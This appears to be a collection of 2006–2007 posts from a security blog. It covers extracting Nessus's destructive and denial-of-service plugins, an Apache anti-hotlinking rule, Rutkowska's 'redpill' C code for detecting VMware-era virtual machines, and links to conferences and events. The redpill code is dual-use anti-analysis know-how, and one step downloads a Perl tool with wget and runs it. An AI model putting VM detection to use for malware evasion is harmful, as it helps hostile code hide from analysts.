egrep -l "(ACT_DESTRUCT|ACT_DENIAL)" *.nasl > c:\temp\dangerous_list.txt


Quick vbs file..
Copy the files listed in dangerous_list.txt to c:\temp\scripts (the directory must already exist).

Dim fso, objInputFile, aFile, Line
Dim strListFile, strScriptDir

Const OPEN_FILE_FOR_READING = 1

strListFile  = "c:\temp\dangerous_list.txt"
strScriptDir = "c:\progra~1\tenable\nessus\plugins\scripts\"

Set fso = CreateObject("Scripting.FileSystemObject")
Set objInputFile = fso.OpenTextFile(strListFile, OPEN_FILE_FOR_READING)

' one plugin filename per line
Do While Not objInputFile.AtEndOfStream
    Line = Trim(objInputFile.ReadLine)
    If Line <> "" Then
        Set aFile = fso.GetFile(strScriptDir & Line)
        aFile.Copy "c:\temp\scripts\" & Line
        Set aFile = Nothing
    End If
Loop

objInputFile.Close
Set fso = Nothing

WScript.Quit(0)

Grab the nessus extract tool via wget (quote the URL, or the shell eats the * and &; -O gives it the name the next command expects)
Dump info to file .. done.

wget "http://cvsweb.nessus.org/cgi-bin/viewcvs.cgi/*checkout*/nessus-tools/nessus-extract/nessus-extract.pl?rev=1.4.2.10&content-type=text/plain" -O nessus_extract.pl

perl nessus_extract.pl -p "c:\temp\scripts" > c:\temp\Dangerous_Plugins.txt

20070122

Apache: redirect direct-linked (hotlinked) images...

Don't let people direct link images .. bad things happen. The first condition leaves requests with no Referer alone (the header is optional and often stripped, so this is a deterrent, not access control), and the extra condition on the replacement image keeps the rule from rewriting its own output in a loop.
RewriteEngine On
RewriteCond %{HTTP_REFERER} !^$
RewriteCond %{HTTP_REFERER} !^http[s]?://(www\.)?yoururl\.com/.*$ [NC]
RewriteCond %{REQUEST_URI} !redirected_image\.jpg$
RewriteRule \.(gif|jpg|jpeg|bmp)$ redirected_image.jpg [L]
- credit fif3

20070111

Detecting VMMs - virtual machine monitors

Red Pill...

/* Joanna Rutkowska's redpill: SIDT stores the 6-byte IDTR into m[]. Under the
 * VMware / Virtual PC of the day the relocated IDT base put m[5] well above
 * 0xd0; on bare metal it did not. 32-bit x86 only (the 4-byte pointer patched
 * into the opcode bytes assumes that), needs an executable stack, and says
 * nothing under hardware-assisted VMMs, which leave the guest's IDT alone. */
int swallow_redpill () {
    unsigned char m[2+4], rpill[] = "\x0f\x01\x0d\x00\x00\x00\x00\xc3";  /* sidt [imm32]; ret */
    *((unsigned*)&rpill[3]) = (unsigned)m;      /* patch in the address of m */
    ((void(*)())&rpill)();                      /* run the two instructions */
    return (m[5]>0xd0) ? 1 : 0;
}


redpill.c

redpill.exe
TrapKit.de info..

VMware fingerprint codes
scoopy doo - A VMware Fingerprint Suite

jerry - A(nother) VMware Fingerprinter

20070104

Northern Virginia Security Groups

NoVA Sec

Pure technical gatherings for security professionals in the northern Virginia area. Check your certifications at the door

http://novasec.blogspot.com/

OWASP NoVA
OWASP chapter meetings are free and open to anyone interested in application security.
http://www.owasp.org/

20070103

MOAB / MOKB / VIZSEC '06

Well to catch up a little on the vuln world.. There's a couple things I'm watching.

Month of Apple Bugs

Info-Pull's MoAB

PoC/Exploit are included with every release.. how nice.

Month Of Kernel Bugs

Info-Pull's the MoKB

Numerous Kernel bugs listed for FreeBSD 6.1, Linux 2.6, as well as OS X.


Retirement of Elsenot.com
ElseNot has officially closed its doors for updates..
"ElseNot part one is done. ElseNot part two may or may not start." ~ Layne


Conference VIZSEC '06

The proceedings for the conference held on November 3rd 2006 have been posted. There are a lot of really interesting white papers.. here are a couple of interest..

2D Visualizations
"VAST: Visualizing Autonomous System Topology"

- Jon Oberheide, Manish Karir and Dionysus Blazakis [whitepaper] [presentation]

"FlowTag: A Collaborative Attack-Analysis, Reporting, and Sharing Tool for Security Researchers"

- Christopher P. Lee and John A. Copeland [whitepaper] [presentation]

"Understanding Multistage Attacks by Attack-Track based Visualization of Heterogeneous Event Streams"

- Sunu Mathew, Richard Giomundo, Shambhu J. Upadhyaya, Moises Sudit, Adam Stotz [whitepaper] [presentation]

"Visual Toolkit for Network Security Experiment Specification and Data Analysis"

- Lunquan Li, Peng Liu, George Kesidis [whitepaper] [presentation]

"An Intelligent, Interactive Tool for Exploration and Visualization of Time-Oriented Security Data"

- Asaf Shabtai, Denis Klimov, Yuval Shahar, and Yuval Elovici[whitepaper] [presentation]

"Visualizing DNS Traffic"

- Pin Ren, John Kristoff and Bruce Gooch [whitepaper] [presentation]


3D Visualizations
"Interactively Combining 2D and 3D Visualization for Network Traffic Monitoring"

- Erwan Le Malecot, Masayoshi Kohara, Yoshiaki Hori, and Kouichi Sakurai [whitepaper] [presentation]

"Real-Time Collaborative Network Monitoring and Control Using 3D Game Engines for Representation and Interaction"

- Warren Harrop and Grenville Armitage [whitepaper] [presentation]

20061120

Command Line Event Viewer

Every once in a while Microsoft does something correctly.. Found the command line event viewer.

Using command-line tools to manage events and event logs

You can also use command-line utilities to create and query event logs and associate programs with particular logged events. For example, you can use Eventcreate to customize an event entry to a specified event log. Eventquery.vbs is used to list the events and event properties from one or more event logs. Eventtriggers enables you to create event triggers that will run programs upon the occurrence of specific events.